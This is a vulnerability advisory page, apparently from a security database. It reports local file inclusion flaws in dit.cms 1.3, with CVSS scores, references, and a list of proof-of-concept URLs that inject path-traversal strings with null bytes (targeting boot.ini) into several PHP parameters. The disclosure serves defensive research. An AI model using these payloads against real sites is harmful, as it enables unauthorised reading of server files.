dit.cms 1.3 (path/sitemap/relPath) Local File Inclusion Vulnerabilities

2009-08-18 / 2009-08-19
Credit: SirGod
Risk: High
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

[+] dit.cms 1.3 (path/sitemap/relPath) Local File Inclusion Vulnerabilities [+] Discovered By SirGod [+] http://insecurity-ro.org [+] http://h4cky0u.org [+] Homepage : http://ditcms.org/ [+] Local File Inclusion - Note : register_globals = on - Vulnerable code is everywhere - PoC's http://127.0.0.1/path/install/index.php?path=../../../../../../../boot.ini%00 http://127.0.0.1/path/menus/left_rightslideopen/index.php?path=../../../../../../../../boot.ini%00 http://127.0.0.1/path/menus/left_rightslideopen/index.php?sitemap=../../../../../../../../boot.ini%00 http://127.0.0.1/path/menus/side_pullout/index.php?sitemap=../../../../../../../../boot.ini%00 http://127.0.0.1/path/menus/side_pullout/index.php?path=../../../../../../../../boot.ini%00 http://127.0.0.1/path/menus/side_slideopen/index.php?path=../../../../../../../../boot.ini%00 http://127.0.0.1/path/menus/side_slideopen/index.php?sitemap=../../../../../../../../boot.ini%00 http://127.0.0.1/path/menus/simple/index.php?path=../../../../../../../../boot.ini%00 http://127.0.0.1/path/menus/top_dropdown/index.php?path=../../../../../../../../boot.ini%00 http://127.0.0.1/path/menus/top_dropdown/index.php?sitemap=../../../../../../../../boot.ini%00 http://127.0.0.1/path/menus/topside/index.php?sitemap=../../../../../../../../boot.ini%00 http://127.0.0.1/path/menus/topside/index.php?path=../../../../../../../../boot.ini%00 http://127.0.0.1/path/index/index.php?relPath=../../../../../../boot.ini%00

References:

http://www.milw0rm.com/exploits/9310
http://secunia.com/advisories/36076


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top